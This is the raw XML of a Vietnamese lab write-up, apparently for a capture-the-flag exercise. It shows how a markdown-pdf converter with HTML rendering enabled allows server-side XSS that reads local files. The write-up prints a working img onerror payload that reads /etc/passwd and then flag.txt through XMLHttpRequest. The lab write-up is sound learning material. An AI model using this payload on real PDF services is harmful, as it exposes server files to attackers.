          <w:p w14:paraId="31ED0ECA" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> Promise((resolve, reject) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E5D3359" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve">    markdownpdf({ remarkable: { html: </w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> } })</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0887C09E" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve">      .</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>from</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:t>.string(content)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AF5146F" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve">      .to.buffer(</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>undefined</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:t>, (err, buffer) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="071DD885" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> (err != </w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> reject(err);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F0812E7" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve"> resolve(buffer);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13C9DE52" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve">      });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42629E52" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t xml:space="preserve">  });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C6081E9" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t>};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D64A47A" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E"/>
          <w:p w14:paraId="1906DE8C" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E">
            <w:r w:rsidRPr="007A565E">
              <w:t>module.exports = { generatePDF };</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37946F03" w14:textId="77777777" w:rsidR="007A565E" w:rsidRPr="007A565E" w:rsidRDefault="007A565E" w:rsidP="007A565E"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="295852A2" w14:textId="77777777" w:rsidR="00A308CE" w:rsidRDefault="00A308CE" w:rsidP="00930899">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47DE71B4" w14:textId="41942DDC" w:rsidR="00715277" w:rsidRDefault="00715277" w:rsidP="00930899">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00715277">
        <w:t>Hàm generatePDF sử dụng thư viện markdown-pdf để chuyển đổi chuỗi content thành file PDF. Đáng chú ý, cấu hình remarkable: { html: true } cho phép render trực tiếp các thẻ HTML có trong nội dung Markdown.</w:t>
      </w:r>
      <w:r w:rsidR="00930899">
        <w:t xml:space="preserve"> Điều đó đã cho phép thẻ img được thực thi như đã được thấy tròn bước trước.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500D5F17" w14:textId="31FC1163" w:rsidR="00A308CE" w:rsidRDefault="00B841C6" w:rsidP="00B841C6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sau đó mình đã thực hiện tìm kiếm thêm thông tin về thư viện </w:t>
      </w:r>
      <w:r w:rsidRPr="00715277">
        <w:t>markdown-pdf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> xem có thể khai thác được không:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E41D6CD" w14:textId="5DC3531C" w:rsidR="007A565E" w:rsidRDefault="00C549FC" w:rsidP="00B841C6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C549FC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="783535E6" wp14:editId="6A688F6D">
            <wp:extent cx="4861560" cy="1790584"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="51181463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814631" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId28"/>
                    <a:srcRect t="3070" b="3677"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4901494" cy="1805292"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="445A717B" w14:textId="1A041A78" w:rsidR="00ED6858" w:rsidRPr="00ED6858" w:rsidRDefault="00B841C6" w:rsidP="00ED6858">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kết quả cho thấy nếu hệ thống sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="00550763" w:rsidRPr="00715277">
        <w:t>markdown-pdf</w:t>
      </w:r>
      <w:r w:rsidR="00550763">
        <w:t xml:space="preserve"> bản 11.0.0</w:t>
      </w:r>
      <w:r w:rsidR="00ED6858" w:rsidRPr="00ED6858">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED6858" w:rsidRPr="00ED6858">
        <w:t xml:space="preserve">thì theo các báo cáo bảo mật đã công bố, phiên bản này tồn tại lỗ hổng nghiêm trọng cho phép khai thác Local File Inclusion (LFI) thông qua cơ chế server-side </w:t>
      </w:r>
      <w:r w:rsidR="00B618D4">
        <w:t>XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C50C6D6" w14:textId="5CC05A51" w:rsidR="00B841C6" w:rsidRDefault="00B841C6" w:rsidP="00B841C6"/>
    <w:p w14:paraId="206FAE0D" w14:textId="7844F465" w:rsidR="00A837DD" w:rsidRDefault="00A837DD">
      <w:r w:rsidRPr="00A837DD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0860CB05" wp14:editId="6061BCCE">
            <wp:extent cx="5731510" cy="2529840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="11453004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300433" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2529840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F3639F" w14:textId="2995B9C1" w:rsidR="002055D4" w:rsidRDefault="00C36364" w:rsidP="00C36364">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C36364">
        <w:t xml:space="preserve">Tiến hành tạo payload dựa trên mã khai thác đã cung cấp nhằm kiểm tra khả năng khai thác lỗ hổng thông qua phương pháp </w:t>
      </w:r>
      <w:r w:rsidR="00B618D4">
        <w:t xml:space="preserve">này, Tạo payload </w:t>
      </w:r>
      <w:r w:rsidR="00B618D4" w:rsidRPr="00B618D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&amp;lt;img src=1 onerror="xhr=new XMLHttpRequest;xhr.onload=function(){document.write((xhr.responseText))};xhr.open("GET","file:///etc/passwd");xhr.send();"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676E25AB" w14:textId="05D6ED98" w:rsidR="007B272D" w:rsidRDefault="007B272D">
      <w:r w:rsidRPr="007B272D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2165A228" wp14:editId="54DDF270">
            <wp:extent cx="5731510" cy="2224405"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="21034014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40141" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2224405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9C0125" w14:textId="77777777" w:rsidR="00B618D4" w:rsidRDefault="00B618D4"/>
    <w:p w14:paraId="52D3A5CF" w14:textId="77777777" w:rsidR="00B618D4" w:rsidRDefault="00B618D4"/>
    <w:p w14:paraId="602D0BC7" w14:textId="77777777" w:rsidR="00B618D4" w:rsidRDefault="00B618D4"/>
    <w:p w14:paraId="4C8DBB5F" w14:textId="77777777" w:rsidR="00B618D4" w:rsidRDefault="00B618D4"/>
    <w:p w14:paraId="3CF0BAD7" w14:textId="77777777" w:rsidR="00B618D4" w:rsidRDefault="00B618D4"/>
    <w:p w14:paraId="04BD7D54" w14:textId="77777777" w:rsidR="00B618D4" w:rsidRDefault="00B618D4"/>
    <w:p w14:paraId="17147742" w14:textId="77777777" w:rsidR="00B618D4" w:rsidRDefault="00B618D4"/>
    <w:p w14:paraId="3C1A00E8" w14:textId="6CA8A5FF" w:rsidR="00535DC5" w:rsidRDefault="00B618D4" w:rsidP="00B618D4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B618D4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Quá trình thực thi payload cho thấy mã khai thác đã hoạt động đúng như kỳ vọng. Nội dung từ tập tin hệ thống /etc/passwd đã được truy xuất và hiển thị thành công, xác nhận rằng lỗ hổng LFI thông qua cơ chế server-side XSS có thể bị khai thác trong môi trường hiện </w:t>
      </w:r>
      <w:r>
        <w:t>tại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68761659" w14:textId="470A74CD" w:rsidR="007B272D" w:rsidRDefault="007B272D">
      <w:r w:rsidRPr="007B272D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="772FC6B8" wp14:editId="5FDA5F74">
            <wp:extent cx="5731510" cy="3818255"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1680703928"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703928" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3818255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02068BE0" w14:textId="7603EB84" w:rsidR="00B618D4" w:rsidRDefault="00B618D4">
      <w:r>
        <w:t>Thay giá trị /etc/passwd thành flag.txt để hoàn thành lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2747BC67" w14:textId="5ABFBEAC" w:rsidR="00535DC5" w:rsidRDefault="00535DC5">
      <w:r w:rsidRPr="00535DC5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0902BF94" wp14:editId="47A8AA68">
            <wp:extent cx="5731510" cy="1348105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="181655954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559540" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1348105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B73874" w14:textId="34353D7E" w:rsidR="00B618D4" w:rsidRDefault="00B618D4">
      <w:r>
        <w:t xml:space="preserve">Flag đã được hiển thị (Vì đây là lab được xây dựng trên </w:t>
      </w:r>
      <w:r w:rsidR="00E97DB8">
        <w:t>source code được cung cấp nên sẽ không có flag thật sự):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61009172" w14:textId="617907EF" w:rsidR="0078123A" w:rsidRPr="002055D4" w:rsidRDefault="0078123A">
      <w:r w:rsidRPr="0078123A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B324253" wp14:editId="1FFA1752">
            <wp:extent cx="5731510" cy="1376680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="909327178" name="Picture 1" descr="A computer screen with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327178" name="Picture 1" descr="A computer screen with a white background&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1376680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0078123A" w:rsidRPr="002055D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CE6245" w14:textId="77777777" w:rsidR="00813AF2" w:rsidRDefault="00813AF2" w:rsidP="006E71DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2F9F7244" w14:textId="77777777" w:rsidR="00813AF2" w:rsidRDefault="00813AF2" w:rsidP="006E71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38ECC3" w14:textId="77777777" w:rsidR="00813AF2" w:rsidRDefault="00813AF2" w:rsidP="006E71DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6273EFA5" w14:textId="77777777" w:rsidR="00813AF2" w:rsidRDefault="00813AF2" w:rsidP="006E71D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AB4ED4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B798DA8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39DB38E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="776CCCCE"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="57216195"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D882A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0873E75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F706CE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187376553">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1433553927">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="542206234">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="7069481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0DAC"/>
    <w:rsid w:val="000154A3"/>
    <w:rsid w:val="000166A3"/>
    <w:rsid w:val="0002152D"/>
    <w:rsid w:val="0004675F"/>
    <w:rsid w:val="000B6DED"/>
    <w:rsid w:val="00105C2F"/>
    <w:rsid w:val="001154C6"/>
    <w:rsid w:val="001175B9"/>
    <w:rsid w:val="001358E0"/>
    <w:rsid w:val="00153D32"/>
    <w:rsid w:val="00157097"/>
    <w:rsid w:val="001923B2"/>
    <w:rsid w:val="001B5858"/>
    <w:rsid w:val="002055D4"/>
    <w:rsid w:val="002227D1"/>
    <w:rsid w:val="00236924"/>
    <w:rsid w:val="002518DD"/>
    <w:rsid w:val="002C18C9"/>
    <w:rsid w:val="0035230B"/>
    <w:rsid w:val="00395CE6"/>
    <w:rsid w:val="003C3B34"/>
    <w:rsid w:val="003D0F18"/>
    <w:rsid w:val="004166C8"/>
    <w:rsid w:val="00446060"/>
    <w:rsid w:val="00497517"/>
    <w:rsid w:val="004A00D3"/>
    <w:rsid w:val="004F1E6A"/>
    <w:rsid w:val="005273E0"/>
    <w:rsid w:val="00535DC5"/>
    <w:rsid w:val="00541DD4"/>
    <w:rsid w:val="00550763"/>
    <w:rsid w:val="00577675"/>
    <w:rsid w:val="00591DBA"/>
    <w:rsid w:val="00597036"/>
    <w:rsid w:val="005A36D4"/>
    <w:rsid w:val="005D4123"/>
    <w:rsid w:val="005D5BAD"/>
    <w:rsid w:val="00603897"/>
    <w:rsid w:val="00612B1E"/>
    <w:rsid w:val="0061528C"/>
    <w:rsid w:val="00623578"/>
    <w:rsid w:val="00644440"/>
    <w:rsid w:val="006553EB"/>
    <w:rsid w:val="00677D10"/>
    <w:rsid w:val="006B2131"/>
    <w:rsid w:val="006C29DA"/>
    <w:rsid w:val="006D3E2C"/>
    <w:rsid w:val="006E71DD"/>
    <w:rsid w:val="00704CE9"/>
    <w:rsid w:val="00715277"/>
    <w:rsid w:val="00727BA6"/>
    <w:rsid w:val="00731EE3"/>
    <w:rsid w:val="00742F6E"/>
    <w:rsid w:val="0078123A"/>
    <w:rsid w:val="007977C2"/>
    <w:rsid w:val="007A565E"/>
    <w:rsid w:val="007B272D"/>
    <w:rsid w:val="00813AF2"/>
    <w:rsid w:val="0084356C"/>
    <w:rsid w:val="00861378"/>
    <w:rsid w:val="00873CCA"/>
    <w:rsid w:val="00880F7E"/>
    <w:rsid w:val="008861B1"/>
    <w:rsid w:val="008A24CD"/>
    <w:rsid w:val="008D7E0B"/>
    <w:rsid w:val="009217E4"/>
    <w:rsid w:val="009220FC"/>
    <w:rsid w:val="00930899"/>
    <w:rsid w:val="0097148F"/>
    <w:rsid w:val="009C31A5"/>
    <w:rsid w:val="00A0539F"/>
    <w:rsid w:val="00A14C32"/>
    <w:rsid w:val="00A308CE"/>
    <w:rsid w:val="00A30E45"/>
    <w:rsid w:val="00A837DD"/>
    <w:rsid w:val="00B3373B"/>
    <w:rsid w:val="00B3416D"/>
    <w:rsid w:val="00B618D4"/>
    <w:rsid w:val="00B820E3"/>
    <w:rsid w:val="00B841C6"/>
    <w:rsid w:val="00B918F0"/>
    <w:rsid w:val="00BA493C"/>
    <w:rsid w:val="00BB1961"/>
    <w:rsid w:val="00BC1FFA"/>
    <w:rsid w:val="00BC6C73"/>
    <w:rsid w:val="00BD305A"/>
    <w:rsid w:val="00C13ED0"/>
    <w:rsid w:val="00C36364"/>
    <w:rsid w:val="00C549FC"/>
    <w:rsid w:val="00CC5B35"/>
    <w:rsid w:val="00D474B7"/>
    <w:rsid w:val="00D83FDE"/>
    <w:rsid w:val="00DD0DAC"/>
    <w:rsid w:val="00E06E5C"/>
    <w:rsid w:val="00E90ACD"/>
    <w:rsid w:val="00E956EC"/>
    <w:rsid w:val="00E97DB8"/>
    <w:rsid w:val="00EC444A"/>
    <w:rsid w:val="00ED6858"/>
    <w:rsid w:val="00F03C4E"/>
    <w:rsid w:val="00F625AA"/>
    <w:rsid w:val="00FF746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E2EBC0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E4882CFF-0010-4D47-93F2-42E93A1AC9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0DA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D0DA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D0DA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D0DA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D0DA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D0D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0D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0D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0D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0DA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D0DA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D0DA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D0DA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D0DA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D0D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0D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0D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0DAC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00DD0D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0D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0D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0D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0DAC"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00DD0DAC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00DD0DAC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00DD0DAC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00DD0DA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D0DAC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00DD0DAC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A0539F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006E71DD"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006E71DD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006E71DD"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006E71D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theme" Target="theme/theme1.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3086</TotalTime>
  <Pages>13</Pages>
  <Words>1624</Words>
  <Characters>9259</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build ryuki</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>build ryuki</cp:lastModifiedBy>
